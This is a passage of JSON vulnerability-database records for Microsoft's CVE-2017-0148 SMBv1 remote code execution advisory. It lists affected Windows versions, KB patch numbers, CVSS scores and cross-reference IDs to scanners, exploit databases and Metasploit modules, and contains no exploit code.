Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB3213986", "KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", 